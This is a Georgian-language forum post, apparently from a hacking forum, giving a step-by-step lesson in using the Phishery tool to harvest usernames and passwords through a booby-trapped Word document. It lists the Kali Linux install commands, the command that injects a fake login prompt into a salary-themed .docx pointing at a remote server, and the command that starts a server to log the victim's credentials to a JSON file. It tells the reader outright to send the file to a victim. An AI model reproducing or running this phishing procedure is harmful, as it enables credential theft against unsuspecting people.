მოგესალმებათ CYBSECGROUP ფორუმი
№1 კიბერ ფორუმი საქართველოში, თქვენ გაქვთ შესაძლებლობა გაეცნოთ საინტერესო პროექტებს, საინტერესო გარემოში
რეგისტრაცია

Word როგორ მივიღოთ მომხმარებლის მონაცემები Microsoft Word-ის საშუალებით? (გაკვეთილი)

LukasBasaria

Loading... 👽
CSG Member
აპრ 25, 2019
5
12
#1
Phishery ანაცვლებს pop-up ფანჯარას არსებულ Microsoft Word დოკუმენტში, რომელშიც ითხოვს მომხმარებლის სახელი და პაროლი.

ინსტალაცია Kali Linux- ზე:
Code:
$ apt-get install phishery
$ mkdir phishery
$ tar -xvf phishery.tar.gz --strip=1 -C ./phishery
cd phishery
გახსენით პარამეტრების ფაილი (settings.json), პარამეტრებშიუნდა მივუთითოთ:
port — პორტი, რომელზეც სერვერი იმუშავებს.

phishery დაყენების შემდეგ, ფაილი docx ფორმატით ატვირთეთ სერვერზე, რომელშიც ჩვსვამთ ფიშინგ კოდს:
Code:
./phishery -u https://example.com/docs -i zarplata.docx -o zarplata_phish.docx
ჩავრთოთ სერვერი ავტორიზაციის მონაცემების მიღებისა და შენახვისთვის:
Code:
$ ./phishery -s settings.json -c credentials.json
ახლა ჩვენ ფაილს ვაგზავნით მსხვერპლს და ველოდებით გახსნას. ფაილის გახსნისას, MS Word- ის თავზე გამოჩნდება ფანჯარა, რომელიც სახელს და პაროლს ითხოვს. ნებისმიერი მონაცემების შეყვანისას და OK ღილაკის დაჭერისას, ჩვენ მივიღებთ ამ მონაცემებს და ისინი ნაჩვენები იქნება ჩანაწერებში და შეინახება credentials.json ფაილში.
6fb9d944-bb45-4710-8e11-bae2dbcb7e65.jpg